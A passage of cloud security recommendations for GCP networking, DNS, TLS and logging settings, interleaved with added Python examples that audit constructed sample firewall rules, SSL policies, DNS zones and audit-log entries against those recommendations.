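One way to check the PostgreSQL flag recommendations on this page (log_hostname above, plus the log_connections and log_disconnections flags listed further down) from an instance description, as an added example that is not Defender for Cloud's or Google's code. It assumes the Cloud SQL Admin API instance shape, where settings.databaseFlags is a list of name/value pairs; because the page only says log_hostname should be set "appropriately", the intended value is a parameter rather than a fixed expectation. The sample instances are constructed.

```python
"""Check Cloud SQL PostgreSQL logging flags discussed on this page.

Added example; not Defender for Cloud's or Google's code. Instances have
the Cloud SQL Admin API shape: settings.databaseFlags is a list of
{"name": ..., "value": ...} and databaseVersion starts with "POSTGRES".
"""

# log_connections and log_disconnections have a fixed expected value on
# this page; log_hostname is only "set appropriately", so the caller states
# the organisation's intended value.
REQUIRED_ON = ("log_connections", "log_disconnections")

# Constructed sample instances.
SAMPLE_INSTANCES = [
    {"name": "pg-prod", "databaseVersion": "POSTGRES_14",
     "settings": {"databaseFlags": [{"name": "log_connections", "value": "on"}]}},
    {"name": "pg-audit", "databaseVersion": "POSTGRES_15",
     "settings": {"databaseFlags": [
         {"name": "log_connections", "value": "on"},
         {"name": "log_disconnections", "value": "on"},
         {"name": "log_hostname", "value": "on"}]}},
    {"name": "mysql-shop", "databaseVersion": "MYSQL_8_0",
     "settings": {"databaseFlags": []}},
]


def database_flags(instance):
    """Return {flag name: value} with values lower-cased for comparison."""
    flags = instance.get("settings", {}).get("databaseFlags", [])
    return {f["name"]: str(f["value"]).lower() for f in flags}


def evaluate_instance(instance, log_hostname="off"):
    """Return findings for one instance; non-PostgreSQL instances get none.

    A flag that is absent takes the PostgreSQL server default, which for all
    three flags is "off".
    """
    if not instance.get("databaseVersion", "").startswith("POSTGRES"):
        return []
    flags = database_flags(instance)
    findings = []
    for name in REQUIRED_ON:
        value = flags.get(name, "off")
        if value != "on":
            findings.append(f"{name}={value} (expected on)")
    value = flags.get("log_hostname", "off")
    if value != log_hostname:
        findings.append(f"log_hostname={value} (expected {log_hostname})")
    return findings


def evaluate_all(instances, log_hostname="off"):
    """Map instance name to findings, omitting compliant instances."""
    report = {}
    for instance in instances:
        findings = evaluate_instance(instance, log_hostname)
        if findings:
            report[instance["name"]] = findings
    return report


if __name__ == "__main__":
    for name, findings in evaluate_all(SAMPLE_INSTANCES).items():
        print(name, findings)
```

The input matches `gcloud sql instances list --format json`; the version prefix check keeps MySQL and SQL Server instances out of a PostgreSQL-only rule, which is the "applicable to PostgreSQL database instances" caveat the page repeats for each flag.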


Recommendation: Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites

Description: Secure Sockets Layer (SSL) policies determine what port Transport Layer Security (TLS) features clients are permitted to use when connecting to load balancers. To prevent usage of insecure features, SSL policies should use (a) at least TLS 1.2 with the MODERN profile; or (b) the RESTRICTED profile, because it effectively requires clients to use TLS 1.2 regardless of the chosen minimum TLS version; or (c) a CUSTOM profile that does not support any of the following features:

TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA

Load balancers are used to efficiently distribute traffic across multiple servers. Both SSL proxy and HTTPS load balancers are external load balancers, meaning they distribute traffic from the Internet to a GCP network.

GCP customers can configure load balancer SSL policies with a minimum TLS version (1.0, 1.1, or 1.2) that clients can use to establish a connection, along with a profile (Compatible, Modern, Restricted, or Custom) that specifies permissible cipher suites.

To comply with users using outdated protocols, GCP load balancers can be configured to permit insecure cipher suites. In fact, the GCP default SSL policy uses a minimum TLS version of 1.0 and a Compatible profile, which allows the widest range of insecure cipher suites. As a result, it is easy for customers to configure a load balancer without even knowing that they are permitting outdated cipher suites.

Severity: Medium
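The three acceptable configurations above translate directly into a policy check. The following is an added example, not Defender for Cloud's or Google's code; it assumes the sslPolicies resource shape (profile, minTlsVersion, customFeatures) and a target proxy that references a policy by name, and it treats a proxy with no policy attached as using the GCP default described above (TLS 1.0, COMPATIBLE). The sample policies and proxies are constructed.

```python
"""Evaluate Compute Engine SSL policies against the cipher-suite rule above.

Added example; not Defender for Cloud's or Google's code. Policies follow
the sslPolicies resource (profile, minTlsVersion, customFeatures); proxies
carry an optional sslPolicy reference, and a proxy without one gets the GCP
default policy described on the page (TLS 1.0, COMPATIBLE).
"""

WEAK_FEATURES = {
    "TLS_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_RSA_WITH_AES_256_GCM_SHA384",
    "TLS_RSA_WITH_AES_128_CBC_SHA",
    "TLS_RSA_WITH_AES_256_CBC_SHA",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}
TLS_ORDER = ["TLS_1_0", "TLS_1_1", "TLS_1_2", "TLS_1_3"]
DEFAULT_POLICY = {"name": "(GCP default)", "profile": "COMPATIBLE",
                  "minTlsVersion": "TLS_1_0"}

# Constructed sample policies and proxies.
SAMPLE_POLICIES = [
    {"name": "modern-tls12", "profile": "MODERN", "minTlsVersion": "TLS_1_2"},
    {"name": "modern-tls11", "profile": "MODERN", "minTlsVersion": "TLS_1_1"},
    {"name": "restricted", "profile": "RESTRICTED", "minTlsVersion": "TLS_1_0"},
    {"name": "custom-weak", "profile": "CUSTOM", "minTlsVersion": "TLS_1_2",
     "customFeatures": ["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
                        "TLS_RSA_WITH_AES_128_GCM_SHA256"]},
    {"name": "custom-ok", "profile": "CUSTOM", "minTlsVersion": "TLS_1_2",
     "customFeatures": ["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"]},
]
SAMPLE_PROXIES = [
    {"name": "web-https-proxy", "sslPolicy": "modern-tls12"},
    {"name": "legacy-https-proxy"},  # no sslPolicy: the GCP default applies
    {"name": "api-ssl-proxy", "sslPolicy": "custom-weak"},
]


def why_weak(policy):
    """Return "" if the policy is acceptable, else the reason it is not."""
    profile = policy.get("profile", "COMPATIBLE")
    min_tls = policy.get("minTlsVersion", "TLS_1_0")
    if profile == "RESTRICTED":
        return ""  # forces TLS 1.2 whatever the minimum version says
    if profile == "MODERN":
        if TLS_ORDER.index(min_tls) >= TLS_ORDER.index("TLS_1_2"):
            return ""
        return f"MODERN profile with minimum {min_tls}"
    if profile == "CUSTOM":
        weak = sorted(set(policy.get("customFeatures", [])) & WEAK_FEATURES)
        if not weak:
            return ""
        return "CUSTOM profile enables " + ", ".join(weak)
    return f"{profile} profile permits outdated cipher suites"


def weak_proxies(proxies, policies):
    """Return (proxy, policy, reason) for every proxy on a weak policy."""
    by_name = {p["name"]: p for p in policies}
    result = []
    for proxy in proxies:
        policy = by_name.get(proxy.get("sslPolicy"), DEFAULT_POLICY)
        reason = why_weak(policy)
        if reason:
            result.append((proxy["name"], policy["name"], reason))
    return result


if __name__ == "__main__":
    for proxy, policy, reason in weak_proxies(SAMPLE_PROXIES, SAMPLE_POLICIES):
        print(f"{proxy}: {policy}: {reason}")
```

Evaluating the proxies rather than only the policies is what catches the case the page warns about: a policy list can look clean while a proxy that never had a policy attached is still negotiating with the default one.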


Recommendation: Ensure that Cloud DNS logging is enabled for all VPC networks

Description: Cloud DNS logging records the queries from the name servers within your VPC to Stackdriver. Logged queries can come from Compute Engine VMs, GKE containers, or other GCP resources provisioned within the VPC.

Security monitoring and forensics cannot depend solely on IP addresses from VPC flow logs, especially when considering the dynamic IP usage of cloud resources, HTTP virtual host routing, and other technology that can obscure the DNS name used by a client from the IP address.

Monitoring of Cloud DNS logs provides visibility to DNS names requested by the clients within the VPC. These logs can be monitored for anomalous domain names, evaluated against threat intelligence, and

Note: For full capture of DNS, firewall must block egress UDP/53 (DNS) and TCP/443 (DNS over HTTPS) to prevent client from using external DNS name server for resolution.

Severity: High

Recommendation: Ensure that DNSSEC is enabled for Cloud DNS

Description: Cloud Domain Name System (DNS) is a fast, reliable and cost-effective domain name system that powers millions of domains on the internet. Domain Name System Security Extensions (DNSSEC) in Cloud DNS enables domain owners to take easy steps to protect their domains against DNS hijacking and man-in-the-middle and other attacks.

Domain Name System Security Extensions (DNSSEC) adds security to the DNS protocol by enabling DNS responses to be validated. Having a trustworthy DNS that translates a domain name like www.example.com into its associated IP address is an increasingly important building block of today's web-based applications.

Attackers can hijack this process of domain/IP lookup and redirect users to a malicious site through DNS hijacking and man-in-the-middle attacks. DNSSEC helps mitigate the risk of such attacks by cryptographically signing DNS records. As a result, it prevents attackers from issuing fake DNS responses that may misdirect browsers to nefarious websites.

Severity: Medium


Recommendation: Ensure that RDP access is restricted from the Internet

Description: GCP Firewall Rules are specific to a VPC Network. Each rule either allows or denies traffic when its conditions are met. Its conditions allow users to specify the type of traffic, such as ports and protocols, and the source or destination of the traffic, including IP addresses, subnets, and instances.

Firewall rules are defined at the VPC network level and are specific to the network in which they are defined. The rules themselves cannot be shared among networks. Firewall rules only support IPv4 traffic.

When specifying a source for an ingress rule or a destination for an egress rule by address, an IPv4 address or IPv4 block in CIDR notation can be used. Generic (0.0.0.0/0) incoming traffic from the Internet to a VPC or VM instance using RDP on Port 3389 can be avoided.

GCP Firewall Rules within a VPC Network apply to outgoing (egress) traffic from instances and incoming (ingress) traffic to instances in the network. Egress and ingress traffic flows are controlled even if the traffic stays within the network (for example, instance-to-instance communication). For an instance to have outgoing Internet access, the network must have a valid Internet gateway route or custom route whose destination IP is specified.

This route simply defines the path to the Internet, to avoid the most general (0.0.0.0/0) destination IP Range specified from the Internet through RDP with the default Port 3389. Generic access from the Internet to a specific IP Range should be restricted.

Severity: High


Recommendation: Ensure that RSASHA1 is not used for the key-signing key in Cloud DNS DNSSEC

Description: Domain Name System Security Extensions (DNSSEC) algorithm numbers in this registry may be used in CERT RRs. Zone signing (DNSSEC) and transaction security mechanisms (SIG(0) and TSIG) make use of particular subsets of these algorithms. The algorithm used for key signing should be a recommended one and it should be strong.

When enabling DNSSEC for a managed zone, or creating a managed zone with DNSSEC, the user can select the DNSSEC signing algorithms and the denial-of-existence type. Changing the DNSSEC settings is only effective for a managed zone if DNSSEC is not already enabled. If there is a need to change the settings for a managed zone where it has been enabled, turn DNSSEC off and then re-enable it with different settings.

Severity: Medium


Recommendation: Ensure that RSASHA1 is not used for the zone-signing key in Cloud DNS DNSSEC

Description: DNSSEC algorithm numbers in this registry may be used in CERT RRs. Zone signing (DNSSEC) and transaction security mechanisms (SIG(0) and TSIG) make use of particular subsets of these algorithms. The algorithm used for key signing should be a recommended one and it should be strong.

When enabling DNSSEC for a managed zone, or creating a managed zone with DNSSEC, the DNSSEC signing algorithms and the denial-of-existence type can be selected. Changing the DNSSEC settings is only effective for a managed zone if DNSSEC is not already enabled. If the need exists to change the settings for a managed zone where it has been enabled, turn DNSSEC off and then re-enable it with different settings.

Severity: Medium
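The Cloud DNS recommendations on this page (DNSSEC enabled, no RSASHA1 key-signing or zone-signing key, and query logging on every VPC network) can all be checked from zone and policy descriptions. The Python below is an added example, not Defender for Cloud's or Google's code; it assumes the Cloud DNS ManagedZone shape (visibility, dnssecConfig.state, dnssecConfig.defaultKeySpecs with keyType and algorithm) and the Cloud DNS Policy shape (enableLogging, networks with networkUrl). The sample zones, networks and policies are constructed.

```python
"""Check Cloud DNS zones and policies for the DNS settings on this page:
DNSSEC enabled, no RSASHA1 key-signing or zone-signing key, and query
logging on every VPC network.

Added example; not Defender for Cloud's or Google's code. Zones follow the
Cloud DNS ManagedZone shape (visibility, dnssecConfig.state,
dnssecConfig.defaultKeySpecs[].keyType/algorithm); policies follow the
Cloud DNS Policy shape (enableLogging, networks[].networkUrl).
"""

NET = "https://www.googleapis.com/compute/v1/projects/example-project/global/networks/"

# Constructed samples.
SAMPLE_ZONES = [
    {"name": "corp-zone", "visibility": "public",
     "dnssecConfig": {"state": "on", "defaultKeySpecs": [
         {"keyType": "keySigning", "algorithm": "rsasha1", "keyLength": 2048},
         {"keyType": "zoneSigning", "algorithm": "rsasha256", "keyLength": 1024}]}},
    {"name": "shop-zone", "visibility": "public",
     "dnssecConfig": {"state": "off"}},
    {"name": "internal-zone", "visibility": "private"},
    {"name": "api-zone", "visibility": "public",
     "dnssecConfig": {"state": "on", "defaultKeySpecs": [
         {"keyType": "keySigning", "algorithm": "ecdsap256sha256", "keyLength": 256},
         {"keyType": "zoneSigning", "algorithm": "ecdsap256sha256", "keyLength": 256}]}},
]
SAMPLE_NETWORKS = [NET + "prod-vpc", NET + "dev-vpc", NET + "lab-vpc"]
SAMPLE_POLICIES = [
    {"name": "prod-dns", "enableLogging": True,
     "networks": [{"networkUrl": NET + "prod-vpc"}]},
    {"name": "dev-dns", "enableLogging": False,
     "networks": [{"networkUrl": NET + "dev-vpc"}]},
]


def zone_findings(zone):
    """Return DNSSEC findings for one managed zone.

    Private zones are skipped: DNSSEC protects resolution of public names.
    """
    if zone.get("visibility", "public") != "public":
        return []
    config = zone.get("dnssecConfig") or {}
    if config.get("state") != "on":
        return ["dnssec-not-enabled"]
    findings = []
    for spec in config.get("defaultKeySpecs", []):
        if spec.get("algorithm", "").lower() == "rsasha1":
            findings.append(f"rsasha1-{spec['keyType']}")
    return findings


def networks_without_dns_logging(network_urls, policies):
    """VPC networks not covered by a DNS policy that has enableLogging set."""
    logged = set()
    for policy in policies:
        if policy.get("enableLogging"):
            logged.update(n["networkUrl"] for n in policy.get("networks", []))
    return sorted(set(network_urls) - logged)


def dns_report(zones, network_urls, policies):
    """Combine both checks into {resource name: findings}."""
    report = {}
    for zone in zones:
        findings = zone_findings(zone)
        if findings:
            report[zone["name"]] = findings
    for url in networks_without_dns_logging(network_urls, policies):
        report[url.rsplit("/", 1)[-1]] = ["dns-logging-not-enabled"]
    return report


if __name__ == "__main__":
    for name, findings in dns_report(SAMPLE_ZONES, SAMPLE_NETWORKS, SAMPLE_POLICIES).items():
        print(name, findings)
```

A network that is attached to a policy with logging turned off is reported the same way as a network with no policy at all, because in both cases no queries reach the logs. The RSASHA1 finding names the key type, which matters because, as the page notes, the fix requires turning DNSSEC off and re-enabling it with different settings.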


Recommendation: Ensure that SSH access is restricted from the internet

Description: GCP Firewall Rules are specific to a VPC Network. Each rule either allows or denies traffic when its conditions are met. Its conditions allow the user to specify the type of traffic, such as ports and protocols, and the source or destination of the traffic, including IP addresses, subnets, and instances.

Firewall rules are defined at the VPC network level and are specific to the network in which they are defined. The rules themselves cannot be shared among networks. Firewall rules only support IPv4 traffic.

When specifying a source for an ingress rule or a destination for an egress rule by address, only an IPv4 address or IPv4 block in CIDR notation can be used. Generic (0.0.0.0/0) incoming traffic from the internet to VPC or VM instance using SSH on Port 22 can be avoided.

GCP Firewall Rules within a VPC Network apply to outgoing (egress) traffic from instances and incoming (ingress) traffic to instances in the network. Egress and ingress traffic flows are controlled even if the traffic stays within the network (for example, instance-to-instance communication).

For an instance to have outgoing Internet access, the network must have a valid Internet gateway route or custom route whose destination IP is specified. This route simply defines the path to the Internet, to avoid the most general (0.0.0.0/0) destination IP Range specified from the Internet through SSH with the default Port '22'. Generic access from the Internet to a specific IP Range needs to be restricted.

Severity: High


Recommendation: Ensure that the default network does not exist in a project

Description: To prevent use of "default" network, a project should not have a "default" network.

The default network has a preconfigured network configuration and automatically generates the following insecure firewall rules:

• default-allow-internal: Allows ingress connections for all protocols and ports among instances in the network.
• default-allow-ssh: Allows ingress connections on TCP port 22 (SSH) from any source to any instance in the network.
• default-allow-rdp: Allows ingress connections on TCP port 3389 (RDP) from any source to any instance in the network.
• default-allow-icmp: Allows ingress ICMP traffic from any source to any instance in the network.

These automatically created firewall rules do not get audit logged and cannot be configured to enable firewall rule logging.

Furthermore, the default network is an auto mode network, which means that its subnets use the same predefined range of IP addresses, and as a result, it's not possible to use Cloud VPN or VPC Network Peering with the default network.

Based on organization security and networking requirements, the organization should create a new network and delete the default network.

Severity: Medium

Recommendation: Ensure that the log metric filter and alerts exist for VPC network changes

Description: It is recommended that a metric filter and alarm be established for Virtual Private Cloud (VPC) network changes.

It is possible to have more than one VPC within a project. In addition, it is also possible to create a peer connection between two VPCs enabling network traffic to route between VPCs. Monitoring changes to a VPC will help ensure VPC traffic flow is not getting impacted.

Severity: Low

Recommendation: Ensure that the log metric filter and alerts exist for VPC Network Firewall rule changes

Description: It is recommended that a metric filter and alarm be established for Virtual Private Cloud (VPC) Network Firewall rule changes. Monitoring for Create or Update Firewall rule events gives insight to network access changes and may reduce the time it takes to detect suspicious activity.

Severity: Low


Recommendation: Ensure that the log metric filter and alerts exist for VPC network route changes

Description: It is recommended that a metric filter and alarm be established for Virtual Private Cloud (VPC) network route changes.

Google Cloud Platform (GCP) routes define the paths network traffic takes from a VM instance to another destination. The other destination can be inside the organization VPC network (such as another VM) or outside of it. Every route consists of a destination and a next hop. Traffic whose destination IP is within the destination range is sent to the next hop for delivery. Monitoring changes to route tables will help ensure that all VPC traffic flows through an expected path.

Severity: Low

Recommendation: Ensure that the 'log_connections' database flag for Cloud SQL PostgreSQL instance is set to On

Description: Enabling the log_connections setting causes each attempted connection to the server to be logged, along with successful completion of client authentication. This parameter cannot be changed after the session starts. PostgreSQL does not log attempted connections by default. Enabling the log_connections setting will create log entries for each attempted connection as well as successful completion of client authentication, which can be useful in troubleshooting issues and to determine any unusual connection attempts to the server.

This recommendation is applicable to PostgreSQL database instances.

Severity: Medium

Recommendation: Ensure that the 'log_disconnections' database flag for Cloud SQL PostgreSQL instance is set to 'on'

Description: Enabling the log_disconnections setting logs the end of each session, including the session duration. PostgreSQL does not log session details such as duration and session end by default. Enabling the log_disconnections setting will create log entries at the end of each session, which can be useful in troubleshooting issues and determining any unusual activity across a time period.

The log_disconnections and log_connections flags work hand in hand and generally, the pair would be enabled/disabled together. This recommendation is applicable to PostgreSQL database instances.

Severity: Medium
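The five metric-filter recommendations on this page (audit configuration, custom role, VPC network, firewall rule and route changes) all come down to matching Cloud Audit Log entries on method name and resource type. The Python below is an added example, not Defender for Cloud's or Google's code, that applies that matching to constructed sample entries so the selection logic behind each alert can be seen and tested offline. The method-name patterns are an assumption modelled on commonly published logs-based metric filters for these events; confirm them against real entries from your own project before building alerts on them.

```python
"""Classify Cloud Audit Log entries into the alert categories the metric
filter recommendations on this page ask for: audit configuration changes,
custom role changes, VPC network changes, firewall rule changes and route
changes.

Added example; not Defender for Cloud's or Google's code. Entries have the
Cloud Logging LogEntry shape (protoPayload.methodName, resource.type). The
method-name patterns are an assumption modelled on commonly published
logs-based metric filters; confirm them against your own audit entries.
"""

# Constructed sample entries, trimmed to the fields the predicates read.
SAMPLE_ENTRIES = [
    {"resource": {"type": "project"},
     "protoPayload": {"methodName": "SetIamPolicy", "serviceData": {"policyDelta": {
         "auditConfigDeltas": [{"action": "ADD", "service": "allServices",
                                "logType": "DATA_READ"}]}}}},
    {"resource": {"type": "project"},
     "protoPayload": {"methodName": "SetIamPolicy", "serviceData": {"policyDelta": {
         "bindingDeltas": [{"action": "ADD", "role": "roles/viewer",
                            "member": "user:carol@example.com"}]}}}},
    {"resource": {"type": "iam_role"},
     "protoPayload": {"methodName": "google.iam.admin.v1.CreateRole"}},
    {"resource": {"type": "gce_network"},
     "protoPayload": {"methodName": "v1.compute.networks.addPeering"}},
    {"resource": {"type": "gce_firewall_rule"},
     "protoPayload": {"methodName": "v1.compute.firewalls.insert"}},
    {"resource": {"type": "gce_route"},
     "protoPayload": {"methodName": "v1.compute.routes.delete"}},
    {"resource": {"type": "gce_instance"},
     "protoPayload": {"methodName": "v1.compute.instances.insert"}},
]


def _method(entry):
    return entry.get("protoPayload", {}).get("methodName", "")


def _resource_type(entry):
    return entry.get("resource", {}).get("type", "")


def _method_has(entry, *fragments):
    # Substring match: Compute method names carry an API version prefix.
    return any(f in _method(entry) for f in fragments)


def is_audit_config_change(entry):
    """SetIamPolicy calls that touched the audit configuration, not just bindings."""
    deltas = (entry.get("protoPayload", {}).get("serviceData", {})
              .get("policyDelta", {}).get("auditConfigDeltas"))
    return _method(entry) == "SetIamPolicy" and bool(deltas)


def is_custom_role_change(entry):
    return _resource_type(entry) == "iam_role" and _method(entry) in {
        "google.iam.admin.v1.CreateRole", "google.iam.admin.v1.DeleteRole",
        "google.iam.admin.v1.UpdateRole"}


def is_vpc_network_change(entry):
    return _resource_type(entry) == "gce_network" and _method_has(
        entry, "compute.networks.insert", "compute.networks.patch",
        "compute.networks.delete", "compute.networks.removePeering",
        "compute.networks.addPeering")


def is_firewall_rule_change(entry):
    return _resource_type(entry) == "gce_firewall_rule" and _method_has(
        entry, "compute.firewalls.patch", "compute.firewalls.insert",
        "compute.firewalls.delete")


def is_route_change(entry):
    return _resource_type(entry) == "gce_route" and _method_has(
        entry, "compute.routes.delete", "compute.routes.insert")


CHECKS = [
    ("audit-config-change", is_audit_config_change),
    ("custom-role-change", is_custom_role_change),
    ("vpc-network-change", is_vpc_network_change),
    ("firewall-rule-change", is_firewall_rule_change),
    ("route-change", is_route_change),
]


def classify(entry):
    """Names of the alert categories this entry would count towards."""
    return [name for name, pred in CHECKS if pred(entry)]


def alert_counts(entries):
    """How many entries each logs-based metric would have counted."""
    counts = {name: 0 for name, _ in CHECKS}
    for entry in entries:
        for name in classify(entry):
            counts[name] += 1
    return counts


if __name__ == "__main__":
    for name, count in alert_counts(SAMPLE_ENTRIES).items():
        print(f"{name}: {count}")
```

The second sample entry shows why the audit-configuration predicate looks at auditConfigDeltas rather than at SetIamPolicy alone: an ordinary role grant is also a SetIamPolicy call, and counting it would make the audit-configuration alert fire on every binding change.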


Recommendation: Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network

Description: Flow Logs is a feature that enables users to capture information about the IP traffic going to and from network interfaces in the organization's VPC Subnets. Once a flow log is created, the user can view and retrieve its data in Stackdriver Logging. It is recommended that Flow Logs be enabled for every business-critical VPC subnet.

VPC networks and subnetworks provide logically isolated and secure network partitions where GCP resources can be launched. When Flow Logs is enabled for a subnet, VMs within that subnet start reporting on all Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) flows.

Each VM samples the TCP and UDP flows it sees, inbound and outbound, whether the flow is to or from another VM, a host in the on-premises datacenter, a Google service, or a host on the Internet. If two GCP VMs are communicating, and both are in subnets that have VPC Flow Logs enabled, both VMs report the flows.

Flow Logs supports the following use cases:
1. Network monitoring.
2. Understanding network usage and optimizing network traffic expenses.
3. Network forensics.
4. Real-time security analysis.

Flow Logs provide visibility into network traffic for each VM inside the subnet and can be used to detect anomalous traffic or insight during security workflows.

Severity: Low

Recommendation: Firewall rule logging should be enabled

Description: This recommendation evaluates the logConfig property in firewall metadata to see if it's empty or contains the key-value pair 'enable': false.

Severity: Medium


Recommendation: Firewall should not be configured to be open to public access

Description: This recommendation evaluates the sourceRanges and allowed properties for one of two configurations:

The sourceRanges property contains 0.0.0.0/0 and the allowed property contains a combination of rules that includes any protocol or protocol:port, except the following: icmp, tcp:22, tcp:443, tcp:3389, udp:3389, sctp:22.

The sourceRanges property contains a combination of IP ranges that includes any non-private IP address and the allowed property contains a combination of rules that permit either all tcp ports or all udp ports.

Severity: High

Recommendation: Firewall should not be configured to have an open CASSANDRA port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:7000-7001, 7199, 8888, 9042, 9160, 61620-61621.

Severity: Low

Recommendation: Firewall should not be configured to have an open CISCOSECURE_WEBSM port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocol and port: TCP:9090.

Severity: Low

Recommendation: Firewall should not be configured to have an open DIRECTORY_SERVICES port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:445 and UDP:445.

Severity: Low

Recommendation: Firewall should not be configured to have an open DNS port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:53 and UDP:53.

Severity: Low
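The public-access rule and the per-port rules in this table (and the further per-port entries of the same form that follow) are all evaluations of a firewall rule's sourceRanges and allowed properties, and the egress deny rule earlier in this section is the mirror image for destinationRanges and denied. The Python below is an added example, not Defender for Cloud's or Google's code, that implements all three from one rule object; it assumes the Compute API firewall resource shape and reads "generic access" as a 0.0.0.0/0 source range. The service port table is taken from the recommendations on this page, and the sample rules are constructed.

```python
"""Evaluate VPC firewall rules against the firewall recommendations above:
open to public access, generic access to well-known service ports, and an
egress deny-all rule. Added example; not Defender for Cloud's or Google's
code. Rules follow the Compute API firewall resource; "generic access" is
read as a 0.0.0.0/0 source range (assumption).
"""
import ipaddress

# Exempt protocol:port pairs for the public-access check (None = no port).
PUBLIC_EXEMPT = {("icmp", None), ("tcp", 22), ("tcp", 443), ("tcp", 3389),
                 ("udp", 3389), ("sctp", 22)}
SERVICE_PORTS = {  # as listed in the per-port recommendations on this page
    "CASSANDRA": {"tcp": ["7000-7001", "7199", "8888", "9042", "9160", "61620-61621"]},
    "CISCOSECURE_WEBSM": {"tcp": ["9090"]},
    "DIRECTORY_SERVICES": {"tcp": ["445"], "udp": ["445"]},
    "DNS": {"tcp": ["53"], "udp": ["53"]},
    "ELASTICSEARCH": {"tcp": ["9200", "9300"]},
    "FTP": {"tcp": ["21"]},
    "HTTP": {"tcp": ["80"]},
    "LDAP": {"tcp": ["389", "636"], "udp": ["389"]},
    "MEMCACHED": {"tcp": ["11211", "11214-11215"], "udp": ["11211", "11214-11215"]},
    "MONGODB": {"tcp": ["27017-27019"]},
    "MYSQL": {"tcp": ["3306"]},
    "NETBIOS": {"tcp": ["137-139"], "udp": ["137-139"]},
    "ORACLEDB": {"tcp": ["1521", "2483-2484"], "udp": ["2483-2484"]},
    "POP3": {"tcp": ["110"]},
    "POSTGRESQL": {"tcp": ["5432"], "udp": ["5432"]},
    "REDIS": {"tcp": ["6379"]},
    "SMTP": {"tcp": ["25"]},
    "SSH": {"tcp": ["22"], "sctp": ["22"]},
    "TELNET": {"tcp": ["23"]},
}
SAMPLE_RULES = [  # constructed sample rules
    {"name": "allow-https", "direction": "INGRESS", "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["443"]}]},
    {"name": "allow-db-world", "direction": "INGRESS", "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["3306", "5432", "27017-27019"]}]},
    {"name": "allow-all-tcp-public", "direction": "INGRESS",
     "sourceRanges": ["35.235.240.0/20"], "allowed": [{"IPProtocol": "tcp"}]},
    {"name": "allow-internal", "direction": "INGRESS", "sourceRanges": ["10.0.0.0/8"],
     "allowed": [{"IPProtocol": "all"}]},
    {"name": "deny-egress", "direction": "EGRESS", "destinationRanges": ["0.0.0.0/0"],
     "denied": [{"IPProtocol": "all"}]},
]

def _port_range(spec):
    low, _, high = str(spec).partition("-")
    return int(low), int(high or low)

def _covers(entry, proto, port):
    """True if one allowed entry grants proto:port (no ports means all)."""
    if entry["IPProtocol"].lower() not in (proto, "all"):
        return False
    if "ports" not in entry:
        return True
    return any(lo <= port <= hi for lo, hi in map(_port_range, entry["ports"]))

def _is_ingress(rule):
    return not rule.get("disabled") and rule.get("direction", "INGRESS") == "INGRESS"

def is_open_to_public(rule):
    """The two public-access configurations described above."""
    if not _is_ingress(rule):
        return False
    sources, allowed = rule.get("sourceRanges", []), rule.get("allowed", [])
    if "0.0.0.0/0" in sources:
        for entry in allowed:
            proto = entry["IPProtocol"].lower()
            if proto == "icmp":
                continue
            if "ports" not in entry:
                return True  # every port of this protocol
            for lo, hi in map(_port_range, entry["ports"]):
                if lo != hi or (proto, lo) not in PUBLIC_EXEMPT:
                    return True
    if any(not ipaddress.ip_network(s, strict=False).is_private for s in sources):
        return any(e["IPProtocol"].lower() in ("tcp", "udp", "all")
                   and "ports" not in e for e in allowed)
    return False

def open_service_ports(rule):
    """Names of services whose ports this rule exposes to 0.0.0.0/0."""
    if not _is_ingress(rule) or "0.0.0.0/0" not in rule.get("sourceRanges", []):
        return []
    exposed = set()
    for service, protos in SERVICE_PORTS.items():
        for proto, specs in protos.items():
            for lo, hi in map(_port_range, specs):
                if any(_covers(e, proto, p) for p in range(lo, hi + 1)
                       for e in rule.get("allowed", [])):
                    exposed.add(service)
    return sorted(exposed)

def has_egress_deny_all(rules):
    """True if an enabled EGRESS rule denies all protocols to 0.0.0.0/0."""
    return any(not r.get("disabled") and r.get("direction") == "EGRESS"
               and "0.0.0.0/0" in r.get("destinationRanges", [])
               and any(d["IPProtocol"].lower() == "all" for d in r.get("denied", []))
               for r in rules)
```

Feed it the list from `gcloud compute firewall-rules list --format json`. Two details are worth noticing: a port range such as "20-25" is never treated as exempt even if one end of it is tcp:22, and a single allowed entry can trip several service checks at once (the allow-db-world sample exposes MySQL, PostgreSQL and MongoDB together), which is why the service check returns a list rather than a boolean.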


Recommendation: Firewall should not be configured to have an open ELASTICSEARCH port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:9200, 9300.

Severity: Low

Recommendation: Firewall should not be configured to have an open FTP port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocol and port: TCP:21.

Severity: Low

Recommendation: Firewall should not be configured to have an open HTTP port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocol and port: TCP:80.

Severity: Low

Recommendation: Firewall should not be configured to have an open LDAP port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:389, 636 and UDP:389.

Severity: Low

Recommendation: Firewall should not be configured to have an open MEMCACHED port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:11211, 11214-11215 and UDP:11211, 11214-11215.

Severity: Low

Recommendation: Firewall should not be configured to have an open MONGODB port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:27017-27019.

Severity: Low

Recommendation: Firewall should not be configured to have an open MYSQL port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocol and port: TCP:3306.

